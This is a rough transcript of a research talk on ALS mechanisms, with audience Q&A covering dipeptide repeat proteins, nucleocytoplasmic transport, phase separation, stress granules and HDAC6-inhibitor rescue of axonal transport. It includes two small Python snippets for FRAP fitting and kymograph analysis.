Basically, you're getting anything that is affecting the nucleopore. Yeah. And it's doing it in both directions. It would be nice if it was always preventing toxicity, but that's not the case. And that's, we are not the only one, by the way, that found this. So other groups have similar problems, so to say. But it's always clear, because there are two other groups that came up with similar data, it's always clear that it has to do with nucleosytoplasmic transport. So that's the interesting thing, let's say. So did you look to see if there is any direction here, directionality here? That's something we are investigating now. So we are now... Because the enhancer versus suppressor could be explained by, who helps to go to one way. Yeah, well, the first thing we thought was maybe the DPRs are just binding to the nucleopore. It doesn't seem to be that simple. I mean, that's not... no. That's, I mean, that had been too easy, I suppose. So could it be that this particular... It's actually the RNA that is... No, in this case, in... Yeah, okay, yeah, yeah. No, no, no, it's bound to a particular problem that's moving around. I mean, because it's so rich in the... All options are open. So yeah, it's... Because of course, yeah, there is RNA, both as proteins that have to pass... No, it's... Yeah, not have to pass the pore. Yeah, yeah, yeah. So it's... No, but it is translated. So it means that the RNA is not... No, no, no, no, you have no idea at this point whether the effect was in the RNA or is the effect in the probe. I know, but it's the chance... It's the possibility that the RNA is stuck in the pore. So how is it... It's not translated. Yeah, but it's... No, no, but it could be other RNA. It could be other RNA that it doesn't need to be the repeat RNA. That's what you, I think, are referring to, wasn't there a question? Okay. My point was the very one where the hexanucleotide repeat was recoded, so the repeat is not... No, no, no, in this case, the repeat is not there. So in the models that we have, there is clearly no effect of repeat RNA. But of course, in the patients, yeah, we don't know. And of course, it could also just be other RNAs. That's the point I just wanted to make. Okay, so that's nucleosytoplasmic transport. We made some nice movies these days. Well, what we think is happening, and so you have to think about the orange dots as being TDP 43. When something is going wrong with nucleosytoplasmic transport, it could very well be that they mislocalize in the cytoplasm, so that in one way or another. But again, this is an oversimplified model because we have no clue how it exactly works. If I then just go to what happens with TDP, so normally TDP is localized in the nucleus. What we see happening over time is that TDP 43 gets mislocalized, not only in the patients that have the hexanucleotide repeat. So this happens in all the patients. So if you would express this in a mammalian cell, do you get also this mislocalization through cell division in other words? I'm trying to figure out whether we see. We don't see mislocalization of TDP 43 in simplified cell system. So we also have, and I will come back to that later. We have for instance now IPSC lines that we can differentiate into all kinds of cells. We don't see in these cell systems, we don't see the same mislocalization of what you see in the patients. But of course these patients, when they become sick, they're 50, 60, 70 years old. In the flies we also don't see mislocalization. So how do you explain that? How do you connect? 
Yeah, well, we don't know. That's the honest answer. And FUS is also mislocalized? Yeah, FUS is also mislocalized. I could more or less tell the same story with FUS instead of TDP43, but FUS is much more rare. That's only in 2-3% of patients. In which cells did you see the mislocalization? The mislocalization is in the patients. So the mislocalization is in post mortem material. But of course you start from what you see in patients, so it's mislocalized. So the question is, what's the explanation for that? The explanation for that could be that there is a problem with nucleocytoplasmic transport. That's the point I just want to make with these movies. The patient you're interrogating after many years, this is not the same as in your culture. Of course not. I mean, that's exactly the point I want to make. So it might not be anything to do with transport, right? No, but it could be. Well, it modifies, these DPRs can modify nucleocytoplasmic transport. Modify the same. So it's in yeast? No, no, no. You can generate cell lines from the patient. Yeah, yeah, yeah. Were all the nuclear pore proteins used, and ZF2 used? That's indeed what people are now doing, that is, whole genome CRISPR-Cas9 screens on iPSC lines or on motor neurons that are differentiated from them. And there is, well, there was, I think, yesterday or the day before yesterday, a paper in Nature Genetics where they have done a DPR screen. It's a group from Stanford where they have done a DPR screen on cell lines. And they found again that nucleocytoplasmic transport was over-represented in the hits they had. Together, I must be honest, with, for instance, ER stress, which was also there. DNA damage-related proteins were there. So it was not only nucleocytoplasmic transport. And, of course, the next question is what happens in a neuronal system, because this was not yet in a neuronal system. Any idea what's special about motor neurons? So what in particular? They have very long axons. And yeah, they also have another way of signaling. So in the glutamatergic signaling, they don't use NMDA receptors. They are more dependent on AMPA receptors. And there are, well, fewer calcium binding proteins. I mean, there are a lot of things that are different in motor neurons in comparison to other neurons. Whether that's all related to the disease, that's, of course, another question. Is it not that these aggregates are actually the cause of the neurological symptoms? No. No. No. And that's, of course, that's also an argument I sometimes use when I have to answer the question. How do you explain the fact that aggregates don't correlate, that aggregates of the DPRs don't correlate with the cells that die in the disease? Maybe it's just a way of the cell to get rid of something that is very dangerous. It's possible. Yeah. Could it be that, due to the long axon, the protein needs to travel a long time in order to get to the nucleus? Yeah, because... To get translated? Yeah, because, yeah, to get translated. No, they are getting translated. Yes, yes. But then they have to travel a long time. Yes, and that's indeed a good point, because one of the roles of TDP43 is to bring RNA to the neuromuscular junction. So in that sense, but then, of course, it has to go back, to go back to the nucleus to get the next RNA. So that axonal transport is important. Well, that seems to be, and I will come back to that if I still have time.
So, the mechanism of this particular transport, what is actually the mechanism? The mechanism of what? Of this transport, what are the proteins which move it? The normal, the normal, yeah, yeah, the normal motor proteins, dynein, kinesins, the normal ones, and I will come back to that at the end of my talk, hopefully. The DNA damage proteins you spoke about, are they known? Yeah, yeah, yeah, they are known. Not by me. Have they something to do with sleep or with the repeat? No, I think, as far as I remember, it's single-strand DNA breaks and double-strand. Well, I mean, but I can try to... Nothing to do with the repeats? No, no, no, no, no, no, it's just... Well, apparently... How do you generate the repeats? Sorry? How do you generate the repeats? In which case? With what you showed. Yeah, that's all overexpression. That's also something you have to keep in mind. Everything I showed until now is overexpression of a construct with a repeat. No, okay. I mean, what you showed, in some cases they are repeats, hexanucleotides, you know. So is it known what is the... how... the mechanism... how these are... Yeah, no. The question now of some... the machinery of DNA... Yeah, yeah, yeah, replication. Yeah, yeah, no, that's not... It's not even known... It's not even known whether the length is the same in every tissue. So it could even be that, for instance, in neurons you have much longer repeats than in other tissues. But it's not... It's easier to verify now with more techniques, yeah? That's what people are doing for the moment. Yeah, yeah, they're trying to figure it out. And it's also not that the next generation always has longer repeats than the previous one. But there is variation. There is clearly variation. But the last word has not been said. I mean, this is relatively recent, like I said. So it's work in progress. Okay, so, yeah, to end this part on nucleocytoplasmic transport: it seems to be a key pathway, and that's confirmed now again with the whole genome CRISPR-Cas9 screen that I just mentioned, and that was published, I think, the day before yesterday. And yeah, what we are investigating for the moment is what the exact mechanism is. So that's still an open question. But while we were doing these experiments, we purified the DPRs, and we had pure protein, pure DPR protein. And when we looked at it in a test tube, we noticed that these test tubes could become opaque. For instance, when we cooled them down, when we just put them on ice, then we could see that something like this happened. So normally, this solution is transparent. If you cool it down or if you add a molecular crowder, it gets opaque. And so what you then see under the microscope is that droplets are formed. So that was not known until we observed it, just by accident. What is in these droplets? So these are droplets of the arginine-containing DPRs. So when we just have arginine-containing DPRs in the right conditions, then we can just see that they form these kinds of droplets, that they phase separate. That's actually what happens. And so that's actually the same as what happens with oil and vinegar. So you have phase separation, so there is no membrane around it. So these proteins seem to cluster together.
And what is now a very popular view in the field, and that brings me back to the formation of the aggregates, is that you have these physiological granules, which are these droplets that are not only formed by DPRs, but also, for instance, by TDP43, which is also a protein with low complexity domains, but also FUS, for instance; that they form these physiological aggregates, sometimes in combination with RNA, but I will come back to that in a minute. And that then, over years, this can result in pathological aggregates, because this process is reversible. So going from soluble to physiological granules is a reversible process. Similar to here: if we just, yeah, well, warm this solution, then these droplets disappear, and we can do that 100 times. There are no aggregates formed in our test tube, but maybe in the cell, under certain conditions, you can have the formation of these physiological granules, these droplets, and then over time they can form pathological aggregates. Yeah, I already told you, but it's a characteristic only, again, of the arginine-containing DPRs. So when there is no arginine in the DPR, you don't see it. Yeah, here is what you see under the microscope. They're not the only arginine-containing ones... even the PAs, are they arginine-containing? So is it common for all DPRs? No, it's only for the arginine-containing DPRs. So you need to have... it's PR or GR. And you also need to have the right buffer conditions, because the problem, of course, is that you have a lot of positive charges, so you need to have counter ions. So in this case, well, you have to have the right buffer, and it works best with a phosphate buffer. So that's what you see here. For instance, in potassium chloride, you don't see them, and that's also why a lot of people missed the formation of these droplets. And what is also important to indicate is that RNA can also be a counter ion, so the negative charges of RNA. And so, for instance, what you see here is increasing concentrations of RNA added to a solution of the arginine-containing DPRs. So the higher the concentration of RNA, the more turbidity we see, the more droplet formation we see. Okay, we can also do FRAP, fluorescence recovery after photobleaching. So we bleach, and then you can see that the fluorescence, if we label the arginine-containing DPRs fluorescently, you can see that the fluorescence comes back. So it's a dynamic process. And here you can see it over time. Well, we have young and old droplets. It doesn't make much of a difference. So it's not that we have aggregate formation in our test tubes, because these are test tube experiments. So then what we did was mass spec on the proteins that associated with these arginine-containing DPRs. So, a little bit to our surprise, when we centrifuged a solution with arginine-containing DPRs, we found that there were a lot of proteins bound to these DPRs. And then when we did mass spec, the most prominent pathway that popped up was the stress granules. And stress granules are also structures that are formed by phase separation. So there are also no membranes around the stress granules. And so then we started to look at stress granules. So this is a cell line where G3BP1 is fluorescently labeled. And then if you put these cells under stress, then you can see that droplets are formed in the cell. And you can even see, if you focus here in this region of the cell, you can see that they also start to form bigger droplets, that they fuse.
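The FRAP measurement mentioned above is usually quantified by fitting a recovery curve, commonly a single exponential, from which one reads off a mobile fraction and a recovery half-time. The sketch below runs on synthetic data with made-up parameters; it is a generic illustration, not the analysis used for these droplets.

```python
import numpy as np
from scipy.optimize import curve_fit

def frap_model(t, i0, a, tau):
    # i0: intensity right after bleaching; a: mobile amplitude; tau: recovery time constant
    return i0 + a * (1.0 - np.exp(-t / tau))

rng = np.random.default_rng(2)
t = np.linspace(0, 60, 61)                            # seconds after the bleach
truth = frap_model(t, 0.2, 0.7, 8.0)                  # invented "true" parameters
data = truth + rng.normal(scale=0.02, size=t.size)    # add measurement noise

(i0, a, tau), _ = curve_fit(frap_model, t, data, p0=[0.1, 0.5, 5.0])
# Pre-bleach intensity is normalised to 1, so the mobile fraction is a / (1 - i0).
print(f"mobile fraction ~ {a / (1 - i0):.2f}, half-time ~ {tau * np.log(2):.1f} s")
```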
A little bit the same as the droplets that I've just shown you in the test tube. But the difference is that these are stress granules in the cell. Here also RNA is included in these stress granules, unlike in what I've shown before. Don't they form the liquid droplets? Can you see the opaqueness? No, no, no, no, no. This is a cell. I mean, you have to label them with... Even when you take them out? What, taking out the stress granules? Yeah, if you... The stress granule has nothing to do with something oil-like... Yeah, well, it's a similar process. The formation of a stress granule is the same thing as what you see when the olive oil is separating from the vinegar. So that's... It's a similar process, of course. I mean, here also RNA is involved, which is not the case when you are looking at your salad dressing. You can halt translation? Yes, yeah, yeah, yeah. And I think G3BP1 is indeed a protein that binds to RNA to prevent it from being translated, because indeed these stress granules... What are these stress granules? Yeah, stress granules are a way of the cell to keep RNA shielded and untranslated for a while, while the cell is taking care of surviving. So it upregulates proteins that keep it alive. And the other RNA, which at that moment is less important, is just stowed away in the stress granules. And they surround the proteins? No, this is a combination of proteins and RNA. So what you see here is a blob of proteins and RNA combined. And it's a very small cell. So this is very small. They are very small granules. But you can see them with a fluorescence microscope. Yeah, yeah, this is fluorescence microscopy. So about 100 nanometers or something. Yeah, something like that. I mean, large. Well, they can... You can have them in different sizes, but they are subcellular. So... What is this a response to? What is stress? Yeah, stress can be everything. So in this case, it's... well, what you see here is arsenite. That's a very popular way of putting cells under stress, but it can also be oxidative stress. It can also be heat. I mean, whatever you can do to a cell that puts it under stress will lead to the formation of these stress granules. And once the stress is gone, these stress granules disassemble. So then the cell just... well, starts to use the RNA again. I mean, that's at least... well, what should happen. It's probably to preserve ATP in part, because mRNA translation is a major consumer of ATP. As well. Yeah, yeah, yeah. So, but in a way, it's just to protect the cell from stress. It's a stress response. And the point I want to make is that... yeah, you can do it by arsenite, so by addition of arsenite, but you can also do it... you can induce these stress granules also by adding the arginine-containing DPRs. So that's also apparently a stress. It also induces stress granules. And what is also indicated here is that in the case that you induce the stress by these DPRs, you have more TDP43 in the stress granules if you compare them to stress granules that are induced by arsenite. So that's my second conclusion. So the arginine-containing residues, they are... well, the arginine-containing DPRs, they undergo liquid-liquid phase separation. These arginine-containing DPRs can also induce stress granules. And it seems to be, but that's a more general conclusion, that numerous pathways, not only nucleocytoplasmic transport, but also stress granule formation, are influenced by these arginine-containing DPRs.
And in the patients, are those actually liquid droplets, or are these...? Yeah, well, you should... well, yeah, these are aggregates. Those are aggregates. Yeah, yeah, yeah, yeah. Yeah, the whole thing is, what we believe is that what we are looking at now in culture is something that happens years before the formation of the aggregates. And that's actually what is also illustrated in this summarizing figure. And this process, so the phase separation and the formation of stress granules, but there are a lot of other structures in the cell that are formed in a similar way, that is a reversible process. And then, over years, this can become irreversible, gels can be formed, and after a certain number of years these gels can also form macroscopic aggregates. That's the idea. I mean, it's not so easy to prove that the same happens in patients because, well, what you see is the end result. You should, well, be able to go back years before the patient dies, which is a bit difficult. And the aggregates in the patients, are they intracellular? Intracellular. Intracellular. Yeah, yeah, they're all intracellular. So cytoplasmic. Yeah. I'm just confused with the liquid-liquid. The aggregates are liquid? No. The aggregates are not liquid. So the aggregates... but that's the... so what you have: first you have soluble protein. Then you have the liquid-liquid phase separation, which gives you these droplets or these stress granules. Then that can lead to gels. That's the next step, where there is maybe a core that is a bit more stable. And that can then, over time, generate these aggregates. So it's a stepwise process. And the first steps of the process are reversible. The last step, once you have an aggregate, it's not reversible anymore. But when you do the experiment in mice, in the ALS models, you see right away... you don't see the liquid? Yeah, no, you don't see it. No, no, no. Well, so in humans, if we look at the mice... Yeah, but there is not a good mouse model for seeing this. Yeah, there is one, there's a good one for ALS, but that's based on SOD1, of which people think that that's the... the SOD1 G93A. There is one good model, but it's not available to the community yet. So once that becomes available, we can test that. They say they saw aggregates right away. In the patients? No, in the mouse. In the mouse. The C9orf72 one? There is, yeah, there is one model where they indeed see aggregates, but it's, yeah, but... Before seeing the liquid? That's what you should check in this mouse model, but that has, as far as I know, not yet been done. Yeah, that's indeed interesting. Yeah. Can you tell me about the gel stuff? Yeah, the gel stage. What do you know about it? Yeah, well, it's just, I mean, less... How do you distinguish it from the stress granule? Yeah, well, in just a test tube you can see that it gelifies, that it's more, yeah... in cells, it's not possible to see that difference. So in cells you see either... You see either the stress granule. Yeah, yeah, yeah. Yeah. The gel thing is more something that comes from a test tube experiment where they can indeed see it. And some people, well, that's a big debate in that field, they say that there is a stable core in these gel-like structures, which then is even another argument for saying there is already... Yeah, it's an intermediate step to, yeah, to the formation of the aggregates. So that's, yeah, okay.
And it never happens in other cases, only in modern humans, hopefully. Maybe also in astrocytes, but that we don't know yet. That should be checked. Yeah. So, yeah, so what is, what is part of these stress granules? No, no, no, no, no, no, no. Yeah, yeah, stress granules happen everywhere. Yeah, yeah. The formation of the aggregates, the transformation of these reversible structures to irreversible aggregates, that seems to be something unique for motor neurons. Maybe because most cells are reproducible. Yeah, yeah. The neurons are not so, they're very, they live for many years. Well, for your entire life. But muscle cells also don't differ usually. Muscle cells do differ, no? Muscle cells regenerate. Oh, yeah. Yeah, yeah, yeah, but motor neurons don't regenerate. So you're born with a number of motor neurons and in the best case, you die with the same number. And ALS patients, yeah, they die when they have lost a large proportion of them. So, that's, so they live, well, if you're lucky, 900 years, which is, makes them, well, all neurons do that. Neurons, that depends. Yes. When you take the very long neurons to the nerve septic, but you know where the neurons are, that's the big... Yeah, that's a big discussion. Yeah, yeah, well, whether there is indeed... Yeah, yeah. But for motor neurons, there is no regeneration. That's, yeah. Also, because it's very unlikely that even when you have a new stem cell that is transformed into a motor neuron, we'll find its target. Because, well, I want to come back to that in a minute. I'm not sure whether I will get there. But the cell body of the motor neuron that is innervating your foot is just at the end of your back. So, it's an axon of one meter in some people, well, or less or more. Yeah. So, it's... Well, the first times are on the leg, very often. Yeah, yeah, yeah, yeah, yeah. So, well, yeah, you have two forms. But the most common form is where the legs and the arms are first involved in the disease. Okay. So, this is... Yeah, now I want to come to axonal transport. So, I think the introduction was already given. So, what we have is iPSCs, so induced pluripotent stem cells that are generated from fibroblasts from ALS patients. So, that... The big difference is that these cells are from patients, are human, and they have the same mutations as the patient. And they have no overexpression. That's, I think, very important to mention. So, you have the mutations in the same genetic context without any overexpression. And what is very interesting is that you can differentiate these cells into all kinds of cells, including motor neurons, and that's what you see here in this picture. So, you can keep them... Some people can keep them for 150 days. Well, we can keep them for 60, 70 days, and then they start to detach. So, you can keep them for a very long time. They form very long axons. And what you can do in these cells is you can measure axonal transport. And this is a chymograph, what you see here. So, these are cells. So, this is the cell body. These are the neurites. And this cell is loaded with a dye that is going to the mitochondria, the functional mitochondria. And what you see here then is this is the length of a neurite. And so, we have taken a picture every second. And so, when we put all these pictures, all these lines next to each other, you get what they call a chymograph. And so, a vertical line is a signal mitochondria that has not been moving. 
So, all the lines that go from here to there, or that go from there to there, are moving mitochondria. And if you know, for instance, that this is the cell body and this is the end of the neurite, then this is anterograde transport and this is retrograde transport. And so you can see this is the control, a control line. This is a line of a patient with a mutation that is causing ALS. But it could also have been a patient with a repeat. So these patients show exactly the same. Over time in culture, they don't die, by the way. That's one of our major frustrations. We can keep these cells for, yeah, months and they don't die. But what they start to show is a defect in axonal transport. In this case of mitochondria, and so this is what I just explained, it's over time. So at week two. Transported mitochondria, you mean the mitochondria are being transported? Yeah, mitochondria are transported along the axons. Very important, because you need energy, for instance at the neuromuscular junction. Where are they made, the mitochondria? No, they're made in the cell body. Not locally in the axon. Yeah, yeah, yeah. So you can see that there are a lot of stationary mitochondria as well. So there are mitochondria that don't move, that stay always at the same place. But the majority of mitochondria are moving in both directions. So it's not so clear why, but anyway, so they're... There are motors? Sorry? There are motors for both directions. Yeah, yeah, yeah, there are motors for both directions, and that's what they do, especially in controls. So here you can see that it is developing over time. So after week two of differentiation, the transport is still okay. After three weeks, it's lower, and then it's going down, and if we waited longer, it would go down even more. It would even become lower. It's not only mitochondria, by the way; we have been looking at other cargos. This is just an example of ER vesicles, but it could have been lysosomes. It could have been RNA, which we can also visualize. It all shows the same phenotype. Over time, you get less axonal transport. Excuse me, did you investigate the synapse? Whether it's the same granule formation or not, physical formation or not? Because that implies the whole... Yeah, but these cells don't form... Well, normally they should form a neuromuscular junction, because these are lower motor neurons, so they don't form... And that's also what we see. They don't really form synapses. They are looking around for muscles, I suppose. And I will show you a picture where we have indeed combined motor neurons with muscles. That's what we are doing now. So we're trying to make motor neurons and muscles in a culture dish. Do they have the arginine-containing peptide? Yes, not the ones I just showed you, but we also have iPSCs from patients with repeats, of which we have shown that they contain DPRs, also in the medium, by the way. And they also show the same axonal transport defect. So that seems to be a general... And just to show you how the movies look, it's running. So this is a culture. It's a FUS patient, but it could have been a C9 patient as well. So this is the cell body, and if you look very carefully, you can see some movement here. So this is a situation where you don't have much transport anymore. The controls, they look like this, but I will tell you immediately what this is. So I hope you can see that there is much more transport now. So you can... If you... You can see here, for instance, this is a very nice one.
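To make the kymograph read-out described above concrete, here is a generic sketch, with made-up tracks and an arbitrary displacement threshold rather than the lab's actual analysis, that classifies each mitochondrial track as stationary, anterograde or retrograde from its net displacement and reports the fraction of motile mitochondria.

```python
import numpy as np

def classify_tracks(tracks, min_displacement=2.0):
    """tracks: list of 1-D position arrays (um along the neurite, cell body at 0)."""
    labels = []
    for pos in tracks:
        net = pos[-1] - pos[0]                  # net displacement over the movie
        if abs(net) < min_displacement:
            labels.append("stationary")
        else:
            labels.append("anterograde" if net > 0 else "retrograde")
    return labels

# Three toy mitochondria imaged for 30 frames (1 frame per second).
t = np.arange(30)
tracks = [20 + 0.1 * np.sin(t),    # wobbles in place -> stationary
          5 + 0.8 * t,             # moves away from the soma -> anterograde
          40 - 0.5 * t]            # moves back towards the soma -> retrograde
labels = classify_tracks(tracks)
moving = sum(l != "stationary" for l in labels) / len(labels)
print(labels, f"-> {moving:.0%} motile")
```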
It starts again. You can see it comes from here, and it's going all the way... Why do you have the H2O-KN? Yeah, that's what I'm going to tell you now. We can rescue this by incubating these cultures overnight with an HDAC6 inhibitor. And it's a misnomer, so it's doing everything except deacetylating histones. So they have classified it as a histone deacetylase, but it is deacetylating cytoplasmic substrates. And one of the substrates is the microtubules. I will show it in a minute. So the difference between this and this is just an overnight treatment with an HDAC6 inhibitor. By the way, we have other systems and other diseases where we also see axonal transport defects. If I ever see a situation where there is less axonal transport, I always tell my people to add an HDAC6 inhibitor, and then you get surprising results. I mean, it's always rescued. And this is, by the way, also how it looks in a control. So this is the situation. This is the patient. This is control. Whatever the mutation. What is the substance used? The HDAC6 inhibitor. What is it doing? Yeah, I will first show the cartoon. So what you have is, to get normal transport, you need to have tracks, you need to have the microtubules, and they need to be acetylated. If they are acetylated, the motor proteins are well connected to these microtubules. If for one reason or another the microtubules get deacetylated, and the protein, the enzyme that is doing that is HDAC6, histone deacetylase 6, but it should be called tubulin deacetylase instead. So then you get a situation like this, and then there is less axonal transport because the motor proteins detach. And so by taking these HDAC6 inhibitors, we reverse this situation into that situation. And then I go one slide back to prove that it is indeed true. So this is acetylated tubulin in patients. This is a patient. So this is the patient. This is, by the way, the isogenic control. So with CRISPR-Cas9 we have corrected the mutation. That's also an advantage of these iPSCs. You can just have the same line, same genetic background, with just one mutation corrected. And then these are treated overnight with two different HDAC6 inhibitors, and you can see that the intensity of the acetylated tubulin is dramatically increased. And by the way, you can also see that there is a slight decrease in the mutant in comparison to the isogenic control. And that's also something we see in a lot of situations, that the acetylation of tubulin is going down in disease conditions. But can you use it in a proper patient? That's a good question. There are, well, we are negotiating to start clinical trials, not in ALS, because that's still, well, we are not able to cure ALS. But we are also using the same strategies in peripheral neuropathies. And just to give you one illustration of which peripheral neuropathies we are thinking about, so you have chemotherapy induced neuropathies. And there you can, yeah, there you have similar things as here. Axonal transport is going less well. And also acetylation of tubulin is going down. So there you could say, okay, we give vincristine, for instance, together with an HDAC6 inhibitor to a patient in order to prevent the neuropathy from happening. Okay, it seems that I have to speed up a little bit, but I'm almost there. I just wanted to show you this conclusion, but where I also show what you see here is a two-compartment system. So here are the motor neurons cultured in one side of the dish. Then you have microgrooves. 
What you see here are the axons that are crossing that groove. And they make contact with what you see here in pink. These are muscle cells. And so this is very recent. So we are now also trying to measure axonal transport in this system. And we are also trying to figure out whether we have or whether we can get neuromuscular junctions. And I think the conclusions, I've already stated them. And just to, well, make sure that you understand what we are talking about. So these are these very long axons of up to one meter. The motor neurons are in your spinal cord. And then the muscles that you have are in your arms or in your legs. And this is the problem that we hope to solve by using HDAC6 inhibitors. Just to wrap up, the nucleocytoplasmic transport defect could be responsible for the mislocalization. This is a two-hit model, like it is proposed in the literature. Not sure whether it's completely true. The second hit could be an aberrant liquid-liquid phase separation. And then this could lead to a number of things, including, for instance, also, axonal transport defects. I also want to say something about whole genome sequencing. I will be very short, because that was actually what was asked. So apart from the four mutations that I have been focusing on today, there are many more genetic causes already known for the disease. And the most recent ones, because this is a function of the time, the most recent ones are the result of exome and whole genome sequencing. And that is, for the moment, a project going on in the ALS field where patients, and that's why they call it Project MinE, patients are giving their DNA. And then, well, we have to give money, or the public has to give money. You can buy the sequencing of one chromosome, or you can buy a half DNA profile of a patient. And so they want to go up to 15,000 ALS patients and 7,500 controls. In just one example that it works, there will be, because this is a slide under embargo, there will be, this will be the cover of Neuron in two weeks, where they have found mutations in KIF5A, it's a kinesin protein, so which is a motor protein, which is mutated. And what is, well, illustrated, so here you have the Axel shipping company that is transporting all these containers along the microtubules. And so apparently when you have a mutation, it doesn't work that well. I mean, it's a visual way. It's made by geneticists, by the way, but I like it. So I think it's nice, and here has to come Neuron, so it's not yet finished. Okay, I'm almost done. If you give me, can I have three more minutes? Three more minutes just to, well, to wrap up everything that is known in the field. But you have so many KIFs, so many motors. Yes, yeah, yeah, not all are mutated. I think you said all of them are affected. Yeah, no, no, no, yeah, that we don't know. Because you say every protein you look at, it's all there. The transport of everything, nothing went through. Yeah, that's right. Then every possible, it means all the motors are affected. Yeah, but we don't know how. In some cases it will be genetics. In other cases we don't know. I would like to end with a movie of three minutes, so it's not, it will not last more than three minutes. Nature Neuroscience Review asked us to summarize 20 years of research in ALS. It was not easy, but I like the end result and I want to share it with you. Amyotrophic lateral sclerosis, shortened to ALS, is a neurodegenerative disease which usually begins in adulthood and advances rapidly. 
It's characterized by the deterioration and loss of both upper and lower motor neurons. As the motor neuron stops sending signals, the muscles weaken, leading to paralysis. When the muscles in the diaphragm are paralyzed, this can be fatal. There is no known cure for ALS. For most people, the cause of their ALS is unknown, but some people inherit the disease from their parents. By studying the genes that are altered in these patients, scientists have pinpointed processes in the neurons that might be causing ALS. It's too early to know which of these altered processes are a result of the disease and which could be a cause, but it's clear that they affect many different aspects of the motor neuron function. Let's start in the cell body. Here, proteins that are not transported into the nucleus build up in the cytoplasm. Errors in the systems that build up and break down proteins also cause other misfolded proteins to accumulate. The different proteins can then aggregate and can become toxic to cells in several ways. For example, they can damage mitochondria, the cell's power generators. Mitochondrial damage can lead to oxidative stress, which can trigger breaks in the DNA of the cell. ALS seems to affect DNA repair processes as well. When DNA breaks are poorly repaired, it ultimately contributes to the death of the neuron. The cell's transport machinery can also be damaged. For example, ALS-affected neurons often have problems transporting RNA, proteins and vesicles, both in the cytoplasm and along the neuron's axon. These vesicles contain important cell signaling molecules called neurotransmitters. If these can't be moved along the axon or released, the neuron can't send messages to its target cells. Damage to the cytoskeleton can also cause the axon to retract. If this happens, the axon can no longer connect to the muscle nearby and can no longer signal the muscle to contract. Other cell types can also be involved in ALS. Oligodendrocytes, which electrically insulate the axon and provide support to the motor neuron, don't work properly in people with ALS. Reduced uptake of neurotransmitters by astrocytes can lead to overactivation of the receptors at the synapse and death of the neuron. Finally, astrocytes and microglia can produce factors that protect or damage motor neurons. Neuronal death occurs when excessive damaging factors are produced. Further research is needed to find out which of these many processes cause the motor neuron degeneration seen in ALS patients. Targeting new drug therapies at those processes might lead to a treatment for this incurable disease. That's it. That's it. Perhaps not surprising question from me. Why do you, you're looking for money to sequence subjects, affected and controls? Why do we need to re-sequence controls? I think they also rely on public databases but they want to, yeah, well, they want to increase the number. I think that's also why they focus much more on patients than on controls. Yeah, yeah, yeah, there are. Do you know where the peptides containing arginine are located in the cells? In the cytoplasm. Not in the ER? It could be. Because ER stress is something that, yeah, yeah, yeah, yeah, yeah, it could be. I don't exclude it. So they may cause ER stress? Yeah, yeah, yeah, yeah, yeah. Yeah, that's just, that's exactly, well, the paper. That's the point that the paper that was published the day before yesterday in Nature Genetics wants to make. I'm going to read the paper. Yeah, you should. It's interesting. 
I mean, I had to write a commentary yesterday evening so I know everything about it. Maybe you said it. I missed it. How is the transcription of the repeats? Is it, is that a polycistronic, a very long, long, long messenger which you should maybe detect? Or is it cleaved right away? And then the translation, how is that? Yeah, it's not, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it's a full messenger. Is it? Yeah, well, but it's some, there are also people that say that it stops in the middle of the repeat. Yeah, that the transcription process, well, that you have also messengers that are... The RNAs are adenylated. Could be. Yeah, otherwise you won't get the heat for the translation. Yeah, but not all these... They're not tough pieces of RNA and get translation, right? The messenger RNAs are adenylated. Yeah, but I mean, these RNAs are not polyadenylated, are also not capped. They are not. So they are excised from the introns, from the... They are introns. Translation, there's part of the mRNA starting from the middle. That's the whole idea, that he doesn't... Yeah, well, I'm not so sure about that... start from the middle, and that's why it was so controversial at the beginning, because there was no precedent. But it also happens in the reverse, in the reverse way, in the antisense. So when you do a reverse, you have also mRNAs that are being translated, you have a transcript. Yeah. Are you coming from the other side? But that's not polyadenylated. It is also polyadenylated. But it isn't. It isn't. He's the expert on that. Then I should sit together next to him this evening. Yeah, I can learn more from you than... It's not polyadenylated. It won't go out of the nucleus if we ever get stuck in the brain. Okay, that's good to know. Yeah. Since this is completely multifactorial. Yeah, that's what we think. So everybody is right. Everybody is right in the field. Everybody is right in the field, right? That's the problem, yeah. But I know that's good. That's how you keep friends, yeah. Okay, if we go now to try to deal with patients. So first, yeah, where do you think one would shoot? It's a very good question. Well, the field at this moment is focusing, especially for the genetic forms, on antisense oligos. So because it's gain of function, and that's at least what we think it is for SOD1, TDP-43, FUS and C9orf72. So if you can prevent the mutant form from being formed. If you can prevent the translation of the mutant containing transcript, then you don't have the mutant protein and that should help. So antisense oligos is the thing people are investing a lot of money in for the moment. But that's only helpful for a limited number of patients. Let's go through the antisense, right? Yeah. I would have to do this, how? The whole life of the individual? These antisense oligos are relatively stable, but you have to re-inject, intrathecally, regularly. You're not going to do that. Well, it depends what kind of disease. In SMA, for instance, spinal muscular atrophy, the therapy that is there is also injection of antisense oligos. No, I realize this, right? Yeah, it's very expensive, first of all. And indeed, it's an intrathecal injection. You would like to find a way to maybe cross the blood-brain barrier? Yeah, yeah, yeah, indeed. Well, the easiest way to stop people from getting familial ALS is prenatal screening. That's the most obvious thing to do, and that happens already. Really? Of course. I mean, is it 100% penetrance? Yeah, close to. 
Not 100%, but it's close to 100%. So it justifies prenatal? Yeah, and it's a terrible disease as well. So if you can... Well, peripheral neuropathies, the inherited ones, also there you have prenatal screening already as a routine kind of thing. Although you don't die from these diseases, so it's more an ethical thing than anything else, but it happens. I mean, pretty sure that it happens. If we eliminated Hawking, I mean, he would not go through this screen. What does he think about it? Sorry? This famous ALS patient, actually two of them, one... Well, he's not genetic. He's not genetic, so for him it doesn't help. So for him it only helps for 10%... Well, maximally for 10% of patients, 90% are not helped, so we have to continue doing research, even if we can solve all the genetic forms. Yeah, and so for the other forms, we hope that we can find a pathway, like for instance, axonal transport, that is a common mechanism also seen in sporadic ALS patients, that we can symptomatically treat these patients, and that it could help them to survive longer. Sure, but for example, you describe their situation, but then you also have a kindness... They have to run, they have to stay. Yeah, yeah, yeah, yeah, yeah. Well, you don't have to convince me that it's a complex disease. Bye. Thank you. Bye-bye, thank you for finding this. Thank you. You're speaking about detailed therapy, but what do you think about cell therapy, right? Pluripotent or totipotent stem cells? Is that not... Well, the problem there is... Right, because I think for brain, for Parkinson, I saw a lot of... Yeah, but the problem is that you have to restore... So you have to restore functionality, so what you... If you replace, well, for instance, this motor neuron is dying, so the axonal... So, yeah, first of all, what we think is happening, that the first problems happen here, so you get denervation, then you get axonal retraction, and in the end, the motor neurons die. So what are you going to do? You're going to transplant stem cells here, and how will they find their targets one meter further away? What's their job? They should find them. Because in heart... 